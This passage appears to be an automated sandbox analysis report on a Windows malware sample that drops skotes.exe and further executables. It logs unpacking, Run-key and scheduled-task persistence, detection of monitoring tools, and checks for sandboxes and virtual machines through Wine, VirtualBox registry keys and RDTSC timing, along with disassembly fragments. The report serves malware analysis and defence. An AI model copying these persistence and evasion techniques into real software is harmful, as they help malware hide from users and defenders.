Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 8ObkdHP9Hq.exe Static file information: File size 1889792 > 1048576
Source: 8ObkdHP9Hq.exe Static PE information: Raw size of hicznzml is bigger than: 0x100000 < 0x19bc00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Unpacked PE file: 0.2.8ObkdHP9Hq.exe.880000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicznzml:EW;rbflpxvq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Unpacked PE file: 21.2.9d7da53f74.exe.f50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Unpacked PE file: 60.2.9d7da53f74.exe.f50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kawjnymv:EW;ldklrfiv:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00B242DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: num.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d74aa should be: 0x1d005d
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x1c1519 should be: 0x1c3efd
Source: 8ObkdHP9Hq.exe Static PE information: real checksum: 0x1d74aa should be: 0x1d005d
Source: 9d7da53f74.exe.5.dr Static PE information: real checksum: 0x1c1519 should be: 0x1c3efd
PE file contains sections with non-standard names
Source: 8ObkdHP9Hq.exe Static PE information: section name:
Source: 8ObkdHP9Hq.exe Static PE information: section name: .idata
Source: 8ObkdHP9Hq.exe Static PE information: section name:
Source: 8ObkdHP9Hq.exe Static PE information: section name: hicznzml
Source: 8ObkdHP9Hq.exe Static PE information: section name: rbflpxvq
Source: 8ObkdHP9Hq.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: hicznzml
Source: skotes.exe.0.dr Static PE information: section name: rbflpxvq
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: kawjnymv
Source: random[1].exe0.5.dr Static PE information: section name: ldklrfiv
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: 9d7da53f74.exe.5.dr Static PE information: section name:
Source: 9d7da53f74.exe.5.dr Static PE information: section name: .rsrc
Source: 9d7da53f74.exe.5.dr Static PE information: section name: .idata
Source: 9d7da53f74.exe.5.dr Static PE information: section name:
Source: 9d7da53f74.exe.5.dr Static PE information: section name: kawjnymv
Source: 9d7da53f74.exe.5.dr Static PE information: section name: ldklrfiv
Source: 9d7da53f74.exe.5.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DBD91C push ecx; ret 5_2_00DBD92F
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B40A76 push ecx; ret 6_2_00B40A89
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B9B035 push ecx; ret 20_2_00B9B048
Source: 8ObkdHP9Hq.exe Static PE information: section name: entropy: 7.985482798218243
Source: 8ObkdHP9Hq.exe Static PE information: section name: hicznzml entropy: 7.954513135451816
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.985482798218243
Source: skotes.exe.0.dr Static PE information: section name: hicznzml entropy: 7.954513135451816
Source: random[1].exe0.5.dr Static PE information: section name: entropy: 7.974967457011881
Source: random[1].exe0.5.dr Static PE information: section name: kawjnymv entropy: 7.953272696615757
Source: 9d7da53f74.exe.5.dr Static PE information: section name: entropy: 7.974967457011881
Source: 9d7da53f74.exe.5.dr Static PE information: section name: kawjnymv entropy: 7.953272696615757
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Jump to dropped file
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d280a9e8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d7da53f74.exe Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00B3F98E
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BB1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_00BB1C41
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B99C10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 20_2_00B99C10
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 8EF4F2 second address: 8EF4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 8EF4F7 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD0B5348056h 0x00000009 jng 00007FD0B5348056h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 jns 00007FD0B5348064h 0x00000019 push dword ptr [ebp+122D10E1h] 0x0000001f cld 0x00000020 call dword ptr [ebp+122D1808h] 0x00000026 pushad 0x00000027 jp 00007FD0B534805Eh 0x0000002d jl 00007FD0B5348058h 0x00000033 pushad 0x00000034 popad 0x00000035 xor eax, eax 0x00000037 xor dword ptr [ebp+122D2A06h], edi 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 mov dword ptr [ebp+122D2A06h], esi 0x00000047 mov dword ptr [ebp+122D2D0Ch], eax 0x0000004d jmp 00007FD0B5348062h 0x00000052 mov esi, 0000003Ch 0x00000057 stc 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c mov dword ptr [ebp+122D1928h], ecx 0x00000062 lodsw 0x00000064 cmc 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 mov dword ptr [ebp+122D18A2h], edx 0x0000006f mov dword ptr [ebp+122D1928h], edi 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jo 00007FD0B534805Ch 0x0000007f mov dword ptr [ebp+122D1928h], edx 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a push ebx 0x0000008b pop ebx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 8EEDD4 second address: 8EEDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A67D83 second address: A67D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
